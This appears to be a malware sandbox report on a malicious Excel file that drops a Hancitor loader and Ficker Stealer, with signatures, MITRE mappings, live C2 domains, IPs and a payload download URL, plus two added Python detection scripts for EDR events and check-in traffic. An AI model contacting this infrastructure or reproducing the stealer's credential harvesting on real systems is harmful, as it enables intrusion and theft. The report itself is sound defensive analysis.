                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\532.dllJump to dropped file
                  Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_5-9703
                  Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_5-8525
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 2324Thread sleep time: -240000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00343400 GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,5_2_00343400
                  Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_5-9256
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0034D00F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0034D00F
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00343580 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,5_2_00343580
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0036EAD1 mov eax, dword ptr fs:[00000030h]5_2_0036EAD1
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0036E607 push dword ptr fs:[00000030h]5_2_0036E607
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0036EA00 mov eax, dword ptr fs:[00000030h]5_2_0036EA00
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00341390 GetProcessHeap,RtlAllocateHeap,5_2_00341390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0035203E __decode_pointer,SetUnhandledExceptionFilter,5_2_0035203E
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0035201C SetUnhandledExceptionFilter,__encode_pointer,5_2_0035201C
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0034D00F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0034D00F
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0034B083 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0034B083
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0034CA9B __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0034CA9B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040115C SetUnhandledExceptionFilter,exit,7_2_0040115C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00401150 SetUnhandledExceptionFilter,7_2_00401150
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004013C9 SetUnhandledExceptionFilter,7_2_004013C9

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\svchost.exe | Domain query: pospvisis.com
Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 50.16.239.65 80
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 8.211.241.0 80
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: tholeferli.com
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 54.235.88.121 80
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 194.147.115.74 80
Source: C:\Windows\SysWOW64\svchost.exe | Domain query: api.ipify.org
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: s0lom0n.ru
Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 95.213.179.67 80
Contains functionality to inject threads in other processes
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_00343880 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,VirtualAlloc,CreateThread,CloseHandle, 5_2_00343880
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
Source: rundll32.exe, 00000004.00000002.2348564592.0000000000720000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349126393.0000000000D30000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: rundll32.exe, 00000004.00000002.2348564592.0000000000720000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349126393.0000000000D30000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000004.00000002.2348564592.0000000000720000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349126393.0000000000D30000.00000002.00000001.sdmp | Binary or memory string: !Progman
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_00356240 cpuid 5_2_00356240
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA, 5_2_00355E13
Source: C:\Windows\SysWOW64\svchost.exe | Code function: CreateMutexA,LoadLibraryA,URLDownloadToFileA,LoadLibraryA,GetComputerNameW,GetSystemInfo,GlobalMemoryStatusEx,GetTimeZoneInformation,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegEnumKeyExW,RegOpenKeyExW, 7_2_00415800
Source: C:\Windows\SysWOW64\svchost.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\AppData\Local VolumeInformation (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\Desktop VolumeInformation (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\Documents VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\AppData\Local\Application Data VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0034BDA0 GetSystemTimeAsFileTime,__aulldiv, 5_2_0034BDA0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0035073E __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,__invoke_watson,__invoke_watson, 5_2_0035073E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_00341AA0 GetVersion,wsprintfA,wsprintfA, 5_2_00341AA0
Source: C:\Windows\SysWOW64\svchost.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ficker Stealer
Source: Yara match | File source: 00000007.00000002.2132921997.000000000022B000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 2292, type: MEMORY
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Windows\SysWOW64\svchost.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\SysWOW64\svchost.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\logins.json
Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Tries to steal Instant Messenger accounts or passwords
Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml

Remote Access Functionality:

Yara detected Ficker Stealer
Source: Yara match | File source: 00000007.00000002.2132921997.000000000022B000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 2292, type: MEMORY
Yara detected Hancitor
Source: Yara match | File source: 5.3.rundll32.exe.1d438c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.rundll32.exe.1d438c.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000003.2121584965.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 2364, type: MEMORY

Mitre Att&ck Matrix

Techniques flagged by at least one signature, grouped by tactic (the digits after a technique are the report's own signature-count markers). Initial Access, Lateral Movement, Exfiltration, Network Effects, Remote Service Effects and Impact had no flagged technique.

• Execution: Scripting (32), Native API (3), Exploitation for Client Execution (33)
• Persistence: DLL Side-Loading (1)
• Privilege Escalation: DLL Side-Loading (1), Process Injection (212)
• Defense Evasion: Disable or Modify Tools (1), Deobfuscate/Decode Files or Information (1), Scripting (32), Obfuscated Files or Information (2), Software Packing (1), DLL Side-Loading (1), Masquerading (1), Virtualization/Sandbox Evasion (1), Process Injection (212), Rundll32 (1)
• Credential Access: OS Credential Dumping (1), Credentials in Registry (2), Credentials In Files (1)
• Discovery: System Time Discovery (2), File and Directory Discovery (1), System Information Discovery (46), Security Software Discovery (2), Virtualization/Sandbox Evasion (1), Process Discovery (3), Remote System Discovery (1), System Network Configuration Discovery (1)
• Collection: Archive Collected Data (1), Data from Local System (1)
• Command and Control: Ingress Tool Transfer (13), Encrypted Channel (2), Non-Application Layer Protocol (3), Application Layer Protocol (123)

Behavior Graph

Behavior Graph ID: 452590 | Sample: 0722_2857746751.xls | Start date: 22/07/2021 | Architecture: WINDOWS | Score: 100

Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 17 other signatures

Process tree (numbers in parentheses are the graph's per-process counters of created registry values and files):

• EXCEL.EXE (12, 34)
  • dropped: C:\Users\user\AppData\Local\Temp\532.dll, PE32
  • signature: Document exploit detected (creates forbidden files)
  • started: rundll32.exe
    • started: rundll32.exe (9)
      • DNS/IP: tholeferli.com 194.147.115.74, ports 49168, 49170, 49172, MIRHOSTINGRU, unknown
      • DNS/IP: s0lom0n.ru 8.211.241.0, ports 49169, 80, CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC, Singapore
      • 3 other IPs or domains
      • signatures: System process connects to network (likely due to code injection or exploit); May check the online IP address of the machine; Contains functionality to inject threads in other processes
      • started: svchost.exe (12)
        • DNS/IP: pospvisis.com 95.213.179.67, ports 49173, 49178, 80, SELECTELRU, Russian Federation
        • DNS/IP: 50.16.239.65, ports 49171, 80, AMAZON-AESUS, United States
        • 3 other IPs or domains
        • signatures: System process connects to network (likely due to code injection or exploit); Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); May check the online IP address of the machine; 3 other signatures
  • started: imjppdmg.exe (12)
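The process tree above (EXCEL.EXE starting rundll32.exe, a second rundll32.exe loading the dropped DLL from the user's Temp directory, that rundll32.exe starting the svchost.exe which then talks to pospvisis.com and reads browser credential stores) is exactly the behaviour a detection engineer would turn into rules. The Python below is an added example and not code from Joe Sandbox or from this report. It evaluates a stream of EDR-style event dicts and flags: an Office process starting rundll32.exe; rundll32.exe loading a DLL from AppData\Local\Temp; svchost.exe whose parent is not services.exe; any connection to an IP from this report's Contacted IPs table; a connection from a suspect svchost.exe even to an address the report never saw; and a non-browser process opening one of the credential stores listed under Stealing of Sensitive Information. ProcessCreate and NetworkConnect use Sysmon field names; FileOpen is an assumed EDR event type, since Sysmon does not log file reads. The events are constructed from the report's tree; the PIDs, the benign services.exe-spawned svchost.exe, the chrome.exe reader and the extra addresses are invented.

```python
# IPs from this report's "Contacted IPs" table.
REPORT_C2_IPS = {"194.147.115.74", "8.211.241.0", "95.213.179.67", "50.16.239.65"}
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# svchost.exe is normally a child of services.exe; in this report rundll32.exe started it.
LEGIT_SVCHOST_PARENTS = {"services.exe"}
# Files Ficker opened in this report, as lower-cased path suffixes.
CREDENTIAL_STORES = (
    "\\google\\chrome\\user data\\default\\login data",
    "\\google\\chrome\\user data\\default\\local state",
    "\\google\\chrome\\user data\\default\\cookies",
    "\\google\\chrome\\user data\\default\\web data",
    "\\logins.json", "\\cookies.sqlite", "\\.purple\\accounts.xml",
)
BROWSER_IMAGES = {"chrome.exe", "firefox.exe", "pidgin.exe"}


def _base(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def triage(events):
    """Return (rule, pid, detail) tuples for every event that matches a rule.
    Event types: ProcessCreate and NetworkConnect (Sysmon field names) and
    FileOpen (assumed EDR event carrying Image and TargetFilename)."""
    findings = []
    suspect_pids = set()  # system processes with the wrong parent, i.e. likely injected
    for ev in events:
        pid, img = ev["ProcessId"], _base(ev["Image"])
        if ev["Type"] == "ProcessCreate":
            parent = _base(ev["ParentImage"])
            cmd = ev.get("CommandLine", "").lower()
            if parent in OFFICE_APPS and img == "rundll32.exe":
                findings.append(("office_spawns_rundll32", pid, cmd))
            if img == "rundll32.exe" and "\\appdata\\local\\temp\\" in cmd and ".dll" in cmd:
                findings.append(("rundll32_temp_dll", pid, cmd))
            if img == "svchost.exe" and parent not in LEGIT_SVCHOST_PARENTS:
                suspect_pids.add(pid)
                findings.append(("svchost_bad_parent", pid, parent))
        elif ev["Type"] == "NetworkConnect":
            dst = f'{ev["DestinationIp"]}:{ev["DestinationPort"]}'
            if ev["DestinationIp"] in REPORT_C2_IPS:
                findings.append(("report_c2_ip", pid, f"{img} -> {dst}"))
            elif pid in suspect_pids:  # new infrastructure, same injected process
                findings.append(("suspect_process_network", pid, f"{img} -> {dst}"))
        elif ev["Type"] == "FileOpen":
            target = ev["TargetFilename"]
            if img not in BROWSER_IMAGES and target.lower().endswith(CREDENTIAL_STORES):
                findings.append(("credential_store_read", pid, f"{img} -> {target}"))
    return findings


SYS32 = "C:\\Windows\\System32\\"
WOW64 = "C:\\Windows\\SysWOW64\\"
EXCEL = "C:\\Program Files\\Microsoft Office\\Office14\\EXCEL.EXE"
LOADER_CMD = SYS32 + "rundll32.exe C:\\Users\\user\\AppData\\Local\\Temp\\omsh.dll,SHIIJGLGNAB"
LOGIN_DATA = "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"

# Constructed events replaying this report's process tree; PIDs and the last four events are invented.
SAMPLE_EVENTS = [
    {"Type": "ProcessCreate", "ProcessId": 1000, "Image": EXCEL,
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": f'"{EXCEL}" 0722_2857746751.xls'},
    {"Type": "ProcessCreate", "ProcessId": 2000, "Image": SYS32 + "rundll32.exe",
     "ParentImage": EXCEL, "CommandLine": LOADER_CMD},
    {"Type": "ProcessCreate", "ProcessId": 2364, "Image": WOW64 + "rundll32.exe",
     "ParentImage": SYS32 + "rundll32.exe", "CommandLine": LOADER_CMD},
    {"Type": "ProcessCreate", "ProcessId": 2292, "Image": WOW64 + "svchost.exe",
     "ParentImage": WOW64 + "rundll32.exe", "CommandLine": SYS32 + "svchost.exe"},
    {"Type": "NetworkConnect", "ProcessId": 2364, "Image": WOW64 + "rundll32.exe",
     "DestinationIp": "194.147.115.74", "DestinationPort": 80},
    {"Type": "NetworkConnect", "ProcessId": 2292, "Image": WOW64 + "svchost.exe",
     "DestinationIp": "95.213.179.67", "DestinationPort": 80},
    {"Type": "FileOpen", "ProcessId": 2292, "Image": WOW64 + "svchost.exe", "TargetFilename": LOGIN_DATA},
    # invented: a C2 address not in the report, a legitimate svchost.exe, and the browser itself
    {"Type": "NetworkConnect", "ProcessId": 2292, "Image": WOW64 + "svchost.exe",
     "DestinationIp": "203.0.113.9", "DestinationPort": 80},
    {"Type": "ProcessCreate", "ProcessId": 800, "Image": SYS32 + "svchost.exe",
     "ParentImage": SYS32 + "services.exe", "CommandLine": SYS32 + "svchost.exe -k netsvcs"},
    {"Type": "NetworkConnect", "ProcessId": 800, "Image": SYS32 + "svchost.exe",
     "DestinationIp": "198.51.100.20", "DestinationPort": 443},
    {"Type": "FileOpen", "ProcessId": 3100, "TargetFilename": LOGIN_DATA,
     "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"},
]

if __name__ == "__main__":
    for rule, pid, detail in triage(SAMPLE_EVENTS):
        print(f"{rule:26} pid={pid:<5} {detail}")
```

The parent check is what catches the injected svchost.exe here; a name-only allowlist of Windows binaries would pass it, since both the image and the command line are legitimate. The same holds for rundll32.exe, which is why the rule keys on the DLL path rather than the binary.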

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
0722_2857746751.xls | 30% | Virustotal |
0722_2857746751.xls | 22% | ReversingLabs | Script.Trojan.Wacatac

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\532.dll | 2% | ReversingLabs |

Unpacked PE Files

Source | Detection | Scanner | Label
5.2.rundll32.exe.340000.0.unpack | 100% | Avira | TR/Hijacker.Gen

Domains

Source | Detection | Scanner
pospvisis.com | 13% | Virustotal
s0lom0n.ru | 1% | Virustotal

URLs

Source | Detection | Scanner | Label
http://s0lom0n.ru/7hsjfd9w4refsd.exe | 3% | Virustotal |
http://s0lom0n.ru/7hsjfd9w4refsd.exe | 100% | Avira URL Cloud | malware
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID | 0% | Avira URL Cloud | safe
http://aidgodown.ru/8/forum.php | 0% | Virustotal |
http://aidgodown.ru/8/forum.php | 0% | Avira URL Cloud | safe
http://tholeferli.com/8/forum.php | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://tholeferli.com/8/forum.phponnect | 0% | Avira URL Cloud | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://relifleappin.ru/8/forum.php | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
elb097307-934924932.us-east-1.elb.amazonaws.com | 54.235.88.121 | true | false | | high
pospvisis.com | 95.213.179.67 | true | true | | unknown
s0lom0n.ru | 8.211.241.0 | true | true | | unknown
tholeferli.com | 194.147.115.74 | true | true | | unknown
api.ipify.org | unknown | unknown | false | | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://s0lom0n.ru/7hsjfd9w4refsd.exe | true | 3% Virustotal; Avira URL Cloud: malware | unknown
http://aidgodown.ru/8/forum.php | true | 0% Virustotal; Avira URL Cloud: safe | unknown
http://tholeferli.com/8/forum.php | true | Avira URL Cloud: safe | unknown
http://api.ipify.org/ | false | | high
http://relifleappin.ru/8/forum.php | true | Avira URL Cloud: safe | unknown
http://api.ipify.org/?format=xml | false | | high

The "safe" Avira URL Cloud verdicts on the three /8/forum.php URLs are reputation lookups and do not override the Malicious flag, which rests on the observed Hancitor check-in traffic to them; s0lom0n.ru/7hsjfd9w4refsd.exe is the follow-on payload download, and api.ipify.org is the external-IP lookup the sample performs before checking in.

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | rundll32.exe, 00000004.00000002.2349091460.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349407298.0000000002317000.00000002.00000001.sdmp | false | | high
http://www.windows.com/pctv. | rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmp | false | | high
http://investor.msn.com | rundll32.exe, 00000004.00000002.2348635367.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | rundll32.exe, 00000004.00000002.2348635367.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmp | false | | high
http://www.icra.org/vocabulary/. | rundll32.exe, 00000004.00000002.2349091460.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349407298.0000000002317000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | rundll32.exe, 00000005.00000002.2349914383.0000000003050000.00000002.00000001.sdmp | false | | high
http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID | rundll32.exe, 00000005.00000003.2121584965.00000000001D0000.00000040.00000001.sdmp, rundll32.exe, 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low
http://investor.msn.com/ | rundll32.exe, 00000004.00000002.2348635367.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmp | false | | high
http://www.%s.comPA | rundll32.exe, 00000005.00000002.2349914383.0000000003050000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://tholeferli.com/8/forum.phponnect | rundll32.exe, 00000005.00000002.2348788273.0000000000553000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | rundll32.exe, 00000004.00000002.2349091460.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349407298.0000000002317000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | rundll32.exe, 00000004.00000002.2348635367.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmp | false | | high
http://api.ipify.org | rundll32.exe | false | | high

The entries http://tholeferli.com/8/forum.phponnect and http://api.ipify.org0.0.0.0ncdrlebGUID=... are string-carving artifacts: the URL ran into the adjacent string in memory. What they actually carry is the check-in URL http://tholeferli.com/8/forum.php, the api.ipify.org lookup, and the Hancitor check-in format string GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64), found in the unpacked DLL at 5.2.rundll32.exe.340000.0 (the same memory the Hancitor Yara rule matched). The msn.com, windows.com, hotmail.com and icra.org URLs come from loaded Windows libraries, not from the malware.
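The format string GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64) is what Hancitor fills in for the body of its HTTP POST check-in, and the /8/forum.php paths listed above are this sample's check-in endpoints. The Python below is an added example, not Joe Sandbox's or the report's code: it recognises such a check-in structurally in proxy records (a POST to a path ending in /8/forum.php whose body carries exactly those seven keys, with TYPE=1 and a WIN value of the form 6.1(x64)), so it also fires on a C2 host that is not in the report's list. The tab-separated "method host path body" record layout is an assumption about the log export, the records are constructed, and the field values (GUID, BUILD, INFO, IP) are invented rather than taken from the report.

```python
import re
from urllib.parse import parse_qs

# Keys of the check-in format string recovered from rundll32.exe memory in this report:
# GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)
HANCITOR_KEYS = ("GUID", "BUILD", "INFO", "EXT", "IP", "TYPE", "WIN")
# Check-in path and hosts from this report's URL tables.
C2_PATH = "/8/forum.php"
C2_HOSTS = {"tholeferli.com", "aidgodown.ru", "relifleappin.ru"}
# WIN is "<major>.<minor>" with an optional "(x64)" suffix, per the format string.
WIN_RE = re.compile(r"^\d+\.\d+(\(x64\))?$")


def parse_hancitor_checkin(method, host, path, body):
    """Return the decoded beacon fields plus host info when the request has the
    Hancitor check-in shape, otherwise None. The match is structural (path, all
    seven keys, TYPE=1, WIN shape) and does not require the host to be a known C2."""
    if method != "POST" or not path.endswith(C2_PATH):
        return None
    # keep_blank_values: EXT is sent empty in the sample below and must still count as present
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if any(k not in fields for k in HANCITOR_KEYS):
        return None
    if fields["TYPE"] != "1" or not WIN_RE.match(fields["WIN"]):
        return None
    return {"host": host, "known_c2": host in C2_HOSTS, **fields}


def scan_log(lines):
    """Run the matcher over tab-separated 'method<TAB>host<TAB>path<TAB>body' records
    (an assumed export layout) and return one dict per check-in found."""
    hits = []
    for line in lines:
        method, host, path, body = line.rstrip("\n").split("\t", 3)
        hit = parse_hancitor_checkin(method, host, path, body)
        if hit is not None:
            hits.append(hit)
    return hits


# Constructed records, not taken from the report; all field values are invented.
SAMPLE_LOG = [
    "POST\ttholeferli.com\t/8/forum.php\t"
    "GUID=1234567890123&BUILD=2207_bcrq&INFO=WIN7-PC @ WIN7-PC\\user&EXT=&IP=203.0.113.10&TYPE=1&WIN=6.1(x64)",
    "GET\tapi.ipify.org\t/?format=xml\t",                    # IP lookup seen in the report, not a check-in
    "POST\tmail.example.org\t/8/forum.php\tGUID=1&BUILD=x",  # same path, wrong body shape
    "POST\tunknown-c2.example\t/8/forum.php\t"
    "GUID=99&BUILD=2207_test&INFO=HOST @ HOST\\u&EXT=&IP=198.51.100.7&TYPE=1&WIN=10.0(x64)",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        tag = "known C2" if hit["known_c2"] else "NEW C2 host"
        print(f'{hit["host"]:20} {tag:12} BUILD={hit["BUILD"]} WIN={hit["WIN"]} GUID={hit["GUID"]}')
```

Matching on the body shape rather than the host list is the point: the three check-in domains in this report are one build's configuration, and the same loader is redeployed with new domains, while the POST body layout is what identifies the family. The BUILD value is worth logging on every hit, as it ties a sighting back to a specific campaign build.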

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
54.235.88.121 | elb097307-934924932.us-east-1.elb.amazonaws.com | United States | 14618 | AMAZON-AESUS | false
50.16.239.65 | unknown | United States | 14618 | AMAZON-AESUS | true
8.211.241.0 | s0lom0n.ru | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true
194.147.115.74 | tholeferli.com | unknown | 52000 | MIRHOSTINGRU | true
95.213.179.67 | pospvisis.com | Russian Federation | 49505 | SELECTELRU | true

                                            General Information

                                            Joe Sandbox Version:33.0.0 White Diamond
                                            Analysis ID:452590
                                            Start date:22.07.2021
                                            Start time:16:09:53
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 8m 57s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Sample file name:0722_2857746751.xls
                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:8
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • GSI enabled (VBA)
                                            • AMSI enabled
